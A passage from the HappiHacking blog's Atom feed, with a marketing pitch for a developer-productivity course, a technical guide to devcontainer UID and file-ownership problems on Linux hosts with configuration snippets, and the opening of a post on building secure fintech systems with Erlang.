&lt;h2 id=&quot;why-this-course-is-perfect-for-you&quot; tabindex=&quot;-1&quot;&gt;Why This Course is Perfect for You&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Nostalgia Meets Now&lt;/strong&gt;
We know you don’t need another lecture on “synergy” or “disruption.” Instead, we’ll help you optimize your workflow with tools that respect your experience, not reinvent the wheel. Think of it as upgrading your &lt;em&gt;Windows 95 mindset&lt;/em&gt; to match today’s needs-minus the Clippy pop-ups.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Motivation, Gamified&lt;/strong&gt;
Module 1 is all about rediscovering your “why.” You’ll craft a personal hero’s journey, not to remain the hero but to level up as the guide. Think Gandalf, Obi-Wan, or that wise mentor every story needs. The real Easter eggs? The friends and skills you’ve gained along the way, equipping you to lead others to greatness. Your role isn’t just about writing code; it’s about writing the legacy others will follow.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;No-BS Productivity Hacks&lt;/strong&gt;
From time-blocking to automation, Module 4 hands you the cheat codes for developer life. And no, these aren’t the CTRL+ALT+DEL kind-they’re about reclaiming your focus and time. Let’s turn “just one more email” into “just one more project milestone.”&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;easter-eggs-for-the-gen-x-soul&quot; tabindex=&quot;-1&quot;&gt;Easter Eggs for the Gen-X Soul&lt;/h3&gt;
&lt;p&gt;We’ve sprinkled the course with references only you’ll get. (Hint: remember &lt;em&gt;Zork&lt;/em&gt;?) Plus, the worksheets are filled with retro-themed tips-because who says work can’t feel like playing your favorite 8-bit RPG?&lt;/p&gt;
&lt;hr /&gt;
&lt;h3 id=&quot;what-youll-leave-with&quot; tabindex=&quot;-1&quot;&gt;What You’ll Leave With&lt;/h3&gt;
&lt;p&gt;By the end of the course, you’ll not only optimize your workflows but also rediscover joy in your craft. You’ll be the mentor every millennial developer dreams of and the legend that even Gen Z looks up to. Yes, you can crush deadlines &lt;em&gt;and&lt;/em&gt; share the best coding memes on Slack.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;lets-do-this&quot; tabindex=&quot;-1&quot;&gt;Let’s Do This&lt;/h2&gt;
&lt;p&gt;Join &lt;em&gt;Mastering Developer Productivity&lt;/em&gt; today. Your career deserves an upgrade, and hey, you might just have fun along the way. Think of it as the ultimate LAN party for your professional life-snacks optional but highly encouraged.&lt;/p&gt;
&lt;p&gt;Just send an email (yes, we prefer old school email to fancy sign up boxes) to &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Developer Productivity</title>
    <link href="https://happihacking.com/blog/posts/2024/developer_productivity/"/>
    <updated>2024-11-26T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/developer_productivity/</id>
    <summary>A New Course by HappiHacking</summary>
    <content type="html">&lt;h1 id=&quot;developer-productivity-mastery-a-new-course-from-happihacking&quot; tabindex=&quot;-1&quot;&gt;Developer Productivity Mastery: A New Course from HappiHacking&lt;/h1&gt;
&lt;p&gt;Feeling stuck in your coding career is like debugging a problem with no stack trace-frustrating, time-consuming, and downright maddening. Maybe your workflows feel inefficient, your automation isn’t automating enough, or your team’s collaboration feels more like controlled chaos than smooth synergy. Whatever the challenge, HappiHacking&#39;s &lt;em&gt;Developer Productivity Mastery&lt;/em&gt; course is here to guide you out of the rut and into a place of clarity, focus, and success.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-the-goal&quot; tabindex=&quot;-1&quot;&gt;What’s the Goal?&lt;/h2&gt;
&lt;p&gt;Imagine going from frustrated to efficient, from overwhelmed to organized. This course is designed to help developers at any stage of their career master their workflows, implement automation effectively, and communicate and collaborate like seasoned professionals. Whether you’re a solo dev or part of a large team, these skills will transform your approach to coding and project management.&lt;/p&gt;
&lt;p&gt;Let’s take your productivity to the next level, turning the daily grind into a well-paced rhythm where you’re in control of your tasks, tools, and time.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;whats-inside-the-course&quot; tabindex=&quot;-1&quot;&gt;What’s Inside the Course?&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Module 1: Developer Motivation - Finding Your Why&lt;/strong&gt;
We’ll start by rediscovering what drives you as a developer, helping you align your daily actions with your broader career goals. By the end of this module, you’ll have a renewed sense of purpose and direction.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 2: Building Productive Habits and Routines&lt;/strong&gt;
Learn how to create and maintain habits that keep you focused, consistent, and efficient. This module emphasizes routines that fit seamlessly into your life, making productivity feel natural rather than forced.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 3: Effective Time Management and Prioritization&lt;/strong&gt;
Dive into techniques like time-blocking, deep work, and effective task prioritization. This module is all about helping you reclaim your time, minimize distractions, and tackle your most important work with clarity.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 4: Mastering Workflow Optimization and Automation&lt;/strong&gt;
Discover how to identify bottlenecks in your workflows and use tools and techniques to remove them. Learn to implement CI/CD, automated testing, and scripting to make repetitive tasks a thing of the past.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 5: Building Better Collaboration and Communication&lt;/strong&gt;
Good teamwork doesn’t happen by accident. This module explores how to communicate clearly, conduct effective code reviews, and create a culture of accountability.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Module 6: Tools, Tricks, and Hacks for Better Development&lt;/strong&gt;
From customizing your IDE to using AI-powered tools for suggestions and error detection, this module is packed with modern tips and techniques to enhance your coding experience.&lt;/p&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;what-makes-this-course-different&quot; tabindex=&quot;-1&quot;&gt;What Makes This Course Different?&lt;/h2&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Practical and Actionable&lt;/strong&gt;
No fluff-every module is designed with real-world applications in mind. You’ll learn techniques you can immediately put into practice to improve your workflow and efficiency.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Adaptable for All Developers&lt;/strong&gt;
Whether you’re just starting out or you’ve been in the industry for decades, this course offers value. The strategies and tools are versatile enough to fit any development role or experience level.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Focus on the Big Picture&lt;/strong&gt;
It’s not just about completing tasks-it’s about understanding how to work smarter, automate repetitive processes, and make your workflows as seamless as possible.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;h2 id=&quot;why-take-this-course&quot; tabindex=&quot;-1&quot;&gt;Why Take This Course?&lt;/h2&gt;
&lt;p&gt;By the end of &lt;em&gt;Developer Productivity Mastery&lt;/em&gt;, you’ll have the tools, skills, and mindset to transform how you work. You’ll handle tasks with confidence, communicate effectively, and use the best tools and practices to optimize your development process.&lt;/p&gt;
&lt;p&gt;Ready to step out of stuck mode and into a productive flow? Contact HappiHacking today, by emailing &lt;a href=&quot;mailto:info@happihacking.se&quot;&gt;info@happihacking.se&lt;/a&gt;, to learn more about this course and our coaching services.&lt;/p&gt;
&lt;p&gt;Let’s make your workday feel less like a grind and more like a game you’re winning!&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Dev Containers Part 3: UIDs and file ownership</title>
    <link href="https://happihacking.com/blog/posts/2024/dev-containers-uids/"/>
    <updated>2024-10-29T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/dev-containers-uids/</id>
    <content type="html">&lt;p&gt;This is the third entry in a series of posts on devcontainers; the first
entry is &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers/&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;In the &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers-emacs/&quot;&gt;previous
post&lt;/a&gt;, we
showed how to configure devcontainers for a small project and how to
access the environment from within Emacs.&lt;/p&gt;
&lt;h2 id=&quot;the-project-directory-mount&quot; tabindex=&quot;-1&quot;&gt;The project directory mount&lt;/h2&gt;
&lt;p&gt;A running container is an isolated bubble, a separate operating system
instance, and by default it does not have access to the host&#39;s file system.
In order for the code running inside the container to have access to your
project files (but no other files on your system), the project root
directory in your local file system must be &lt;em&gt;mounted&lt;/em&gt; inside the container.
This is one of the things that devcontainers do automatically for you.&lt;/p&gt;
&lt;p&gt;Typically, the container runs a version of Linux, such as Ubuntu, or
Alpine, and it will see your files through the eyes of a Linux file system
with Unix-style User Identifiers (UIDs), Group Identifiers (GIDs), and
permission flags (read/write/execute). Although it is possible to run Windows
or MacOS as the operating system inside the container, this article is only
about the Linux case.&lt;/p&gt;
&lt;p&gt;Your host system, on the other hand, could be anything - Windows (with an
NTFS file system), MacOS (with Apple File System), or another Linux system
running a typical Linux file system like &lt;code&gt;ext4&lt;/code&gt; natively.&lt;/p&gt;
&lt;p&gt;When a devcontainer is started (automatically by VSCode or some other
editor, or manually via the devcontainer CLI), the project root
&lt;code&gt;.../DIRNAME&lt;/code&gt; in the host file system gets mounted in the container under
the path &lt;code&gt;/workspace/DIRNAME&lt;/code&gt;, using a Docker &lt;em&gt;bind mount&lt;/em&gt;, so the
project&#39;s files can be accessed from within. This should just work with no
effort from you.&lt;/p&gt;
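&lt;p&gt;Under the hood, this bind mount corresponds roughly to the following Docker invocation (a simplified sketch - the path, directory name, and image are placeholders, and the real tooling passes many more options):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;# Roughly what the devcontainer tooling does for you:
# mount the project root read-write at /workspace/DIRNAME
docker run --rm -it -v /path/to/DIRNAME:/workspace/DIRNAME \
    -w /workspace/DIRNAME some-image
&lt;/code&gt;&lt;/pre&gt;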
&lt;h2 id=&quot;file-ownership&quot; tabindex=&quot;-1&quot;&gt;File ownership&lt;/h2&gt;
&lt;p&gt;The big question is how the &amp;quot;user&amp;quot; inside the container - the processes
running on your behalf - can be allowed to read and modify these files. For
this to work, it must look to the container as if the files are owned by
the same user account as the one running the processes, or alternatively as
if the processes are running as the super-user (&lt;code&gt;root&lt;/code&gt; in Linux) who is
allowed to do anything.&lt;/p&gt;
&lt;p&gt;On Windows and Mac OS, there is a virtualization layer that maps between
the external user&#39;s own user ID and group ID (the ones used in the native
file system on the host), and the Linux-style UID and GID used by the
processes and the mounted files inside the container. Regardless of whether
the UID inside the container is 0 (root) or something else like 1000
(typically the first normal user account in Linux), the virtualization will
translate the file ownership so the processes in the container may access
the files, and outside the container, it looks like it was you who made the
changes directly in the host file system, e.g. NTFS on Windows.&lt;/p&gt;
&lt;p&gt;On Linux, however, there is no virtualization, just sandboxing, and all
UIDs and GIDs are passed through directly between the container and the
host system. It is more efficient, but at the same time it can be quite
confusing.&lt;/p&gt;
&lt;h2 id=&quot;devcontainers-on-linux&quot; tabindex=&quot;-1&quot;&gt;Devcontainers on Linux&lt;/h2&gt;
&lt;p&gt;If you&#39;re only running on Mac OS or Windows and it&#39;s not your job to
actually fiddle with the devcontainer configuration, then congratulations,
you can skip the rest of this article. But if you need to understand what
happens on a Linux host and want to make sure your containers are
configured properly, then read on.&lt;/p&gt;
&lt;h3 id=&quot;no-uidgid-translation&quot; tabindex=&quot;-1&quot;&gt;No UID/GID translation&lt;/h3&gt;
&lt;p&gt;Symptoms of this lack of translation can be:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Processes in the container are not allowed to read or write files in the
workspace.&lt;/p&gt;
&lt;p&gt;Typically, this happens if the UID inside the container is 1000 but your
actual UID on the host system is 1001, or vice versa.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Files or directories that were created inside the container cannot be
modified or deleted outside the container because they are owned by root.&lt;/p&gt;
&lt;p&gt;This happens if the container processes run as UID 0. They will always
be allowed to create or modify files in the workspace, but any files or
directories created will be owned by UID 0 also in the host file system.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
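&lt;p&gt;To check whether you are affected, compare your UID on the host with the UID inside the container (the container name &lt;code&gt;my-devcontainer&lt;/code&gt; here is just an example):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;# On the host:
id -u                               # e.g. 1001
# Inside the running container:
docker exec my-devcontainer id -u   # e.g. 1000, or 0 for root
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If the two numbers differ, you are likely to run into one of the symptoms above.&lt;/p&gt;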
&lt;h3 id=&quot;uid-update&quot; tabindex=&quot;-1&quot;&gt;UID Update&lt;/h3&gt;
&lt;p&gt;Devcontainers do have a &amp;quot;UID update&amp;quot; functionality on Linux. It is however
not a mapping like the one done on Windows or Mac OS. It&#39;s just some extra
code that, as the container starts, will check if the external UID is
different from the internal, and if so, it will update the UID within the
container (by straight up modifying the internal &lt;code&gt;/etc/passwd&lt;/code&gt; file) to be
the same as the external one. It will also update the Group ID in the same
way.&lt;/p&gt;
&lt;p&gt;The problem is that it only works under these conditions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The UID inside the container must not be 0 (root), since that account
is special and cannot be given another ID.&lt;/li&gt;
&lt;li&gt;The external UID must not already be in use by some other account
inside the container, so that the update does not cause a clash.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;If these conditions are not met, UID updating is skipped, and the container
will run with its default UID.&lt;/p&gt;
&lt;h3 id=&quot;when-it-works&quot; tabindex=&quot;-1&quot;&gt;When it works&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;If your external user happens to be UID 1000, as it typically is on a
single user Linux system, and the container also runs as UID 1000
internally, then no UID update is needed and things just work.&lt;/li&gt;
&lt;li&gt;If the container runs as any account except root, such as UID 1000, and
your external user is something else such as UID 1001 (or 1017 or
whatever), as it might be on a multi user Linux system, then as long as
the container does not have another account internally that could clash
with yours, the UID update will happen and things will also just work.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id=&quot;when-it-doesnt-work&quot; tabindex=&quot;-1&quot;&gt;When it doesn&#39;t work&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Many containers have been designed to run as root internally, through a
&lt;code&gt;USER&lt;/code&gt; declaration in the Dockerfile, and this will result in symptom 2
above.&lt;/li&gt;
&lt;li&gt;Some containers have multiple user accounts internally, which can prevent
UID update. For example, if the container is set up to run its processes
as UID 1001, and your external UID is 1000, then the UID update would try
to make the container use 1000 instead - but if that UID is already in
use within the container, then the update fails, and the container
processes will use its default UID, probably resulting in symptom 1
above.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The latter can easily happen when the Dockerfile that specifies the dev
container starts from a base image assuming it has no user with UID 1000 or
above, and then creates a new user with something like &lt;code&gt;RUN useradd&lt;/code&gt;
for its own purposes. If the assumption is wrong and UID 1000 already
exists in the base image, the new user will get UID 1001, and it might work
fine on Windows and Mac OS thanks to the virtualization, but breaks on a
Linux host.&lt;/p&gt;
&lt;h3 id=&quot;overriding-the-base-container&quot; tabindex=&quot;-1&quot;&gt;Overriding the base container&lt;/h3&gt;
&lt;p&gt;Luckily, most problems can be fixed in the &lt;code&gt;devcontainer.json&lt;/code&gt; file, if it
is not in your power to rebuild the container image.&lt;/p&gt;
&lt;p&gt;First of all, you can set &lt;code&gt;containerUser&lt;/code&gt; to override the default for all
processes, or you can set &lt;code&gt;remoteUser&lt;/code&gt; to just override the user for
devcontainer commands.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;containerUser&amp;quot;: &amp;quot;name-or-UID&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is like specifying &lt;code&gt;USER&lt;/code&gt; in a Dockerfile, so all the container&#39;s
processes will launch as that user by default.&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;remoteUser&amp;quot;: &amp;quot;name-or-UID&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This only changes the user for running commands from the outside with
&lt;code&gt;devcontainer exec&lt;/code&gt;. This is also what happens when a tool like VSCode runs
stuff inside the container. (What &lt;code&gt;devcontainer exec&lt;/code&gt; does is basically
just to parse the &lt;code&gt;devcontainer.json&lt;/code&gt; file and then run &lt;code&gt;docker exec -u name-or-UID&lt;/code&gt;.)&lt;/p&gt;
&lt;p&gt;In most documentation, &lt;code&gt;remoteUser&lt;/code&gt; is the recommended one to set. I have
not yet found a good explanation of when it is preferable to set
&lt;code&gt;containerUser&lt;/code&gt; instead.&lt;/p&gt;
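&lt;p&gt;Putting this together, a minimal &lt;code&gt;devcontainer.json&lt;/code&gt; might look as follows (the image and user name are examples; any devcontainer-ready image with a matching non-root user will do):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;{
    &amp;quot;image&amp;quot;: &amp;quot;mcr.microsoft.com/devcontainers/base:ubuntu-22.04&amp;quot;,
    &amp;quot;remoteUser&amp;quot;: &amp;quot;vscode&amp;quot;
}
&lt;/code&gt;&lt;/pre&gt;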
&lt;h3 id=&quot;doing-the-right-thing&quot; tabindex=&quot;-1&quot;&gt;Doing the right thing&lt;/h3&gt;
&lt;p&gt;Depending on how the base container is set up, you will need to do
different things in order to make UID updating work, so that the UID inside
the container will be the same as your external user ID:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;If the base container runs as root, but also has a single non-root
user that you can use (such as &lt;code&gt;ubuntu&lt;/code&gt; or &lt;code&gt;vscode&lt;/code&gt;), you only need to
specify that internal user name or UID with &lt;code&gt;remoteUser&lt;/code&gt; or
&lt;code&gt;containerUser&lt;/code&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If the base container runs as root, and &lt;em&gt;does not have a usable non-root
user&lt;/em&gt;, don&#39;t panic: you just need to create that user when the container
starts. Thankfully someone has already solved this so you do not need to
write any weird scripts yourself.&lt;/p&gt;
&lt;p&gt;Specify the user name with &lt;code&gt;remoteUser&lt;/code&gt; or &lt;code&gt;containerUser&lt;/code&gt; as above,
but also add the following &lt;a href=&quot;https://containers.dev/implementors/features/&quot;&gt;feature
declaration&lt;/a&gt; (see
&lt;a href=&quot;https://github.com/nils-geistmann/devcontainers-features/blob/main/src/create-remote-user/README.md&quot;&gt;https://github.com/nils-geistmann/devcontainers-features/blob/main/src/create-remote-user/README.md&lt;/a&gt;):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-json&quot;&gt;&amp;quot;features&amp;quot;: {
    &amp;quot;ghcr.io/nils-geistmann/devcontainers-features/create-remote-user:0&amp;quot;: {
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If the base container already has a user with UID 1000, but it cannot be
the devcontainer user for some reason, then adding a new user is not
enough - the external UID will often be 1000, and then the automatic UID
updating will fail because UID 1000 is already in use internally. One
possibility is then to use a wrapper Dockerfile that changes UIDs or
removes users; see
&lt;a href=&quot;https://code.visualstudio.com/remote/advancedcontainers/add-nonroot-user#_change-the-uidgid-of-an-existing-container-user&quot;&gt;https://code.visualstudio.com/remote/advancedcontainers/add-nonroot-user#_change-the-uidgid-of-an-existing-container-user&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;If you for some reason want to prevent UID update from happening at all,
it can be disabled by setting &lt;code&gt;&amp;quot;updateRemoteUserUID&amp;quot;: false&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
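&lt;p&gt;As an illustration of the wrapper approach in the third point, a Dockerfile along these lines frees up UID 1000 by moving an existing internal user out of the way (the base image and user names are invented for the example):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-dockerfile&quot;&gt;FROM some-base-image
# Move the existing user to another UID so that UID 1000 becomes free
RUN usermod -u 1999 existinguser
# Create the user that the devcontainer will run as
RUN useradd -m -u 1000 devuser
&lt;/code&gt;&lt;/pre&gt;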
&lt;h3 id=&quot;devcontainer-ready-images&quot; tabindex=&quot;-1&quot;&gt;Devcontainer-ready images&lt;/h3&gt;
&lt;p&gt;A lot of the documentation on dev containers assumes you&#39;re using VSCode,
and often also that you are using a devcontainer-ready image that is
already set up with a suitable non-root user and some dev tools, and not
just some basic Docker image like &lt;code&gt;ubuntu:22.04&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In that case you typically do not need to set &lt;code&gt;remoteUser&lt;/code&gt;, or use the
&lt;code&gt;create-remote-user&lt;/code&gt; feature. For example, in
&lt;a href=&quot;https://github.com/devcontainers/images&quot;&gt;https://github.com/devcontainers/images&lt;/a&gt;
the images &lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-20.04&lt;/code&gt; and
&lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-22.04&lt;/code&gt; both have a default
user &lt;code&gt;vscode&lt;/code&gt; with UID 1000.(*)&lt;/p&gt;
&lt;p&gt;If you write your own Dockerfile for your devcontainer configuration
instead of referring to some existing image, you should ensure that it is
set up similarly so that it can be expected to work for everyone.&lt;/p&gt;
&lt;p&gt;&lt;small&gt;(*) In Microsoft&#39;s devcontainer images, the &lt;code&gt;USER&lt;/code&gt; setting is actually root,
but the images have additional &lt;code&gt;devcontainer.metadata&lt;/code&gt; which can provide
the same settings as &lt;code&gt;devcontainer.json&lt;/code&gt;, and this contains an entry
&lt;code&gt;&amp;quot;remoteUser&amp;quot;:&amp;quot;vscode&amp;quot;&lt;/code&gt;, so that when started from VSCode or with
&lt;code&gt;devcontainer up&lt;/code&gt;, the user will be &lt;code&gt;vscode&lt;/code&gt;. When started with a plain
Docker command, the metadata is not parsed.&lt;/small&gt;&lt;/p&gt;
&lt;h3 id=&quot;ubuntu-24-hickups&quot; tabindex=&quot;-1&quot;&gt;Ubuntu 24 hiccups&lt;/h3&gt;
&lt;p&gt;As of Ubuntu 24 (Noble Numbat), the Ubuntu base image comes with a non-root
user &lt;code&gt;ubuntu&lt;/code&gt; with UID 1000 - though by default the container will run as
root. This means that you need to set &lt;code&gt;remoteUser&lt;/code&gt; to &lt;code&gt;ubuntu&lt;/code&gt;, but you
must not use the &lt;code&gt;create-remote-user&lt;/code&gt; feature (which you needed on Ubuntu
22 and earlier).&lt;/p&gt;
&lt;p&gt;The corresponding devcontainer image from Microsoft
(&lt;code&gt;mcr.microsoft.com/devcontainers/base:ubuntu-24.04&lt;/code&gt;) has the additional
&lt;code&gt;vscode&lt;/code&gt; user as usual, but in the earlier versions of this image it gets
UID 1001. When your external UID is 1000, as it often is, the UID update is
skipped because UID 1000 is in use by the &lt;code&gt;ubuntu&lt;/code&gt; user. This has been
fixed in &lt;code&gt;mcr.microsoft.com/devcontainers/base:1.2.0-ubuntu-24.04&lt;/code&gt; and
later (by deleting the &lt;code&gt;ubuntu&lt;/code&gt; user). If you cannot switch to that
version, you can either explicitly set &lt;code&gt;&amp;quot;remoteUser&amp;quot;: &amp;quot;ubuntu&amp;quot;&lt;/code&gt;, or you can
wrap the image in a Dockerfile that does &lt;code&gt;RUN userdel -r ubuntu&lt;/code&gt;.&lt;/p&gt;
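&lt;p&gt;The wrapper Dockerfile for the latter workaround can be as small as this:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-dockerfile&quot;&gt;FROM mcr.microsoft.com/devcontainers/base:ubuntu-24.04
# Free UID 1000 by removing the stock ubuntu user
RUN userdel -r ubuntu
&lt;/code&gt;&lt;/pre&gt;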
&lt;h3 id=&quot;emacs&quot; tabindex=&quot;-1&quot;&gt;Emacs&lt;/h3&gt;
&lt;p&gt;If you&#39;re using &lt;a href=&quot;https://happihacking.com/blog/posts/2023/dev-containers-emacs/&quot;&gt;Emacs with
Tramp&lt;/a&gt; to
access the files (after starting the container with &lt;code&gt;devcontainer up --workspace-folder .&lt;/code&gt;), you can open a file in the container by writing the
path as&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;/docker:&amp;lt;container-name-or-ID&amp;gt;:/path/to/file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;(e.g. after pressing &lt;code&gt;C-x C-f&lt;/code&gt;). This will however use the container&#39;s
default user, because Emacs does not know about the &lt;code&gt;devcontainer.json&lt;/code&gt;
file. To select a different user you can write&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;/docker:&amp;lt;username-or-ID&amp;gt;@&amp;lt;container-name-or-ID&amp;gt;:/path/to/file
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This should work by default in Emacs 29 or later.&lt;/p&gt;
&lt;h2 id=&quot;conclusion&quot; tabindex=&quot;-1&quot;&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The way Docker containers map onto different platforms, and how to
configure devcontainers to take this into account, can be a source of much
hair pulling and long sessions of googling. We hope this piece can be of
help.&lt;/p&gt;
</content>
  </entry>
  
  <entry>
    <title>Enhancing Fintech Security with Erlang</title>
    <link href="https://happihacking.com/blog/posts/2024/security_for_fintech/"/>
    <updated>2024-09-24T00:00:00Z</updated>
    <id>https://happihacking.com/blog/posts/2024/security_for_fintech/</id>
    <summary>Build Scalable and Reliable Fintech Systems with Erlang</summary>
    <content type="html">&lt;h1 id=&quot;enhancing-fintech-security-with-erlang-insights-from-happihacking&quot; tabindex=&quot;-1&quot;&gt;Enhancing Fintech Security with Erlang: Insights from HappiHacking&lt;/h1&gt;
&lt;div style=&quot;width: 98%; text-align: center;&quot;&gt; &lt;img class=&quot;img-panel&quot; src=&quot;https://happihacking.com/images/water_and_sky.jpg&quot; alt=&quot;Erlang for Fintech Systems.&quot; style=&quot;width: 100%; object-fit: contain;&quot; title=&quot;Erlang for Fintech Systems.&quot; /&gt; &lt;/div&gt;
&lt;p&gt;As the former CTO of Klarna and the founder of &lt;strong&gt;HappiHacking&lt;/strong&gt; and &lt;strong&gt;Kindio&lt;/strong&gt;,
I&#39;ve spent years at the intersection of financial systems and security.
The growth of digital transactions has made fintech platforms a prime target for cyber threats.
I&#39;ve found that leveraging Erlang&#39;s unique capabilities significantly enhances the security,
scalability, and reliability of financial applications.&lt;/p&gt;
&lt;p&gt;In this post, I&#39;ll share insights into the unique security challenges faced by fintech
companies and how Erlang can be utilized to address these challenges effectively.&lt;/p&gt;
&lt;h2 id=&quot;the-unique-security-challenges-in-fintech&quot; tabindex=&quot;-1&quot;&gt;The Unique Security Challenges in Fintech&lt;/h2&gt;
&lt;p&gt;Fintech platforms handle sensitive personal and financial data daily.
This makes them lucrative targets for cybercriminals employing tactics like
phishing, malware, and distributed denial-of-service (DDoS) attacks.
New vulnerabilities are constantly emerging, and integrating modern
applications with legacy systems often adds layers of complexity.&lt;/p&gt;
&lt;p&gt;Ensuring security requires robust technological solutions and a deep understanding of
regulatory compliance. Regulations like &lt;strong&gt;GDPR&lt;/strong&gt;, &lt;strong&gt;PSD2&lt;/strong&gt;, &lt;strong&gt;PCI DSS&lt;/strong&gt;, and standards
like &lt;strong&gt;ISO/IEC 27001&lt;/strong&gt; mandate strict guidelines for data protection and transaction security.
Non-compliance can result in severe penalties and loss of customer trust.&lt;/p&gt;
&lt;h2 id=&quot;building-security-from-the-ground-up-with-erlang&quot; tabindex=&quot;-1&quot;&gt;Building Security from the Ground Up with Erlang&lt;/h2&gt;
&lt;p&gt;Erlang&#39;s architecture provides a robust foundation for developing secure fintech applications, and at &lt;strong&gt;HappiHacking&lt;/strong&gt;, we have fully leveraged its capabilities to create systems that are both secure and high-performing. One of the key strengths of Erlang is its support for concurrency and process isolation. Erlang’s lightweight processes operate independently and communicate through message passing, ensuring that failures or data leaks are contained, minimizing the risk of cascading issues across the system.&lt;/p&gt;
&lt;p&gt;Additionally, Erlang&#39;s focus on immutable data structures aligns well with the functional programming paradigm, reducing the complexity involved in managing concurrent operations and eliminating the risk of accidental data modifications. This characteristic enhances both system reliability and security.&lt;/p&gt;
&lt;p&gt;Another critical feature of Erlang is its built-in fault tolerance, achieved through the use of supervision trees. These trees monitor system processes and automatically detect and restart failed processes, ensuring high availability and resilience-both of which are crucial for financial applications that demand uninterrupted uptime.&lt;/p&gt;
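&lt;p&gt;A minimal supervision tree for such a system might be declared like this (a sketch only - the module and child names are invented for illustration):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-erlang&quot;&gt;%% Sketch of a supervisor that restarts a failed worker automatically
-module(payments_sup).
-behaviour(supervisor).
-export([start_link/0, init/1]).

start_link() -&amp;gt;
    supervisor:start_link({local, ?MODULE}, ?MODULE, []).

init([]) -&amp;gt;
    SupFlags = #{strategy =&amp;gt; one_for_one, intensity =&amp;gt; 5, period =&amp;gt; 10},
    Children = [#{id =&amp;gt; tx_worker,
                  start =&amp;gt; {tx_worker, start_link, []},
                  restart =&amp;gt; permanent}],
    {ok, {SupFlags, Children}}.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;With a &lt;code&gt;one_for_one&lt;/code&gt; strategy, a crash in one worker is contained and repaired without disturbing its siblings - exactly the isolation property described above.&lt;/p&gt;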
&lt;h2 id=&quot;best-practices-for-securing-fintech-applications&quot; tabindex=&quot;-1&quot;&gt;Best Practices for Securing Fintech Applications&lt;/h2&gt;
&lt;p&gt;Building on Erlang&#39;s strengths, here are some best practices we&#39;ve implemented in our projects:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Encrypt All Data&lt;/strong&gt;: Utilize strong encryption algorithms for data at rest and in transit. Erlang&#39;s &lt;code&gt;ssl&lt;/code&gt; module facilitates the implementation of secure communication channels.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
